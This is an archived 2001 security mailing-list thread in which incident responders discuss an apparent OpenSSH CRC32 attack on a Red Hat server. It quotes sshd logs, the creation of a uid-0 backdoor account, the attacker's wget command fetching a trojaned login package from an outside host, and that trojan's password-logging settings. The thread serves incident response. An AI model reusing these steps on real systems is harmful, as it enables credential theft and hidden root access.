We've disabled the account where the group was storing the login.tgz file. The accounts are simply part of free hosting we provide, the box was not hacked. See http://home.dal.net for more info about the setup. On a similar note, I've noticed scans to port 22 increase recently. - Aaron Schultz [Wagahai] - DALnet Webteam On Mon, 3 Dec 2001 johan.augustssonat_private wrote: > > I stumbeled over this post at openssh-unix-dev mailinglist last week - > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2 > The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for > RedHat 7.0) up and running when he received what looks to be a > CRC32-attack. A few minutes later you can see (he posted parts of the > logfile) a new user being created with uid=0 and then how an connection > is made from system in Israel. > > There has been no confirmation about what he writes but I recieved the > following mail as an answer of my questions. > > ------ Message ------ > I posted an openssh security alert earlier today and already got some > responses. > Thanks for everything. > > Instead of replying to everyone individually I composed the details of > the > attack. > > +++ > > It does not look like a job of worms. > Snort did not detect mass port scan from attacker's ip address. It seems > that he (I assumed, so I don't have to type he/she all the way) just > wants > to gain access through openssh. > > The server is running Red Hat 7.0. With all packages up to date. The > following daemons are running: wu-ftpd, apache, telnet, openssh, named > I never access the system via telnet, it is there just for backup > purpose. > > > > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation > attack: > > > network attack detected > > > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on > > > input. > > > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on > > > input. > > > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on > > > input. > > > Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as) > > > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528 > > > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, > gid=528, > > > home=/home/mattanl, shell=/bin/bash > > > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529 > > > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, > gid=529, > > > home=/home/mattan, shell=/bin/bash > > After the attacker gained root access. He created two users mattan and > mattanl. > He then downloaded a package: wget > http://home.dal.net/resolve/login.tgz. > The target site has been compromised. (hacked by a hacker group in > Israel) > This is a login replacement package, it logs the user id and passwords. > He > modified rk.h to: > #define MY_LOGFILE "/dev/ttypz" > #define MY_PASSWORD "1245890" > After he complied and installed the login replacement. Something went > wrong. > /bin/login was zero bytes in length. So when he came back using telnet, > he > was denied of access. I also disabled sshd and kept one session open for > remote control after found login was replaced. I md5 checked the system > against a good backup, nothing else was altered. > > I will try to sniff all packets come to my this server on ssh port. If > he > attempts to crack the server again, I will have more details. But I > guess I > will have to turn the server back on. > > Thanks for all you time > ------ End of message ------ > > I had some further questions so I mailed the guy once again but has not > recieved any answer. > > So, to he main question. > Has anyone else had a system compromised by the CRC32-attack when > running a version of sshd that is believed to be secure? OpenSSH-2.3.0 > or later, SSH 1.2.32 or later. > > > > /Johan Augustsson > > -------------------------------------------------------------------- > Johan Augustsson Phone: +46 (0)31 773 1000 > Incident Response Team Fax: +46 (0)31 773 1087 > Göteborg University E-mail: Johan.Augustssonat_private > Sweden > -------------------------------------------------------------------- > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 12:23:45 PST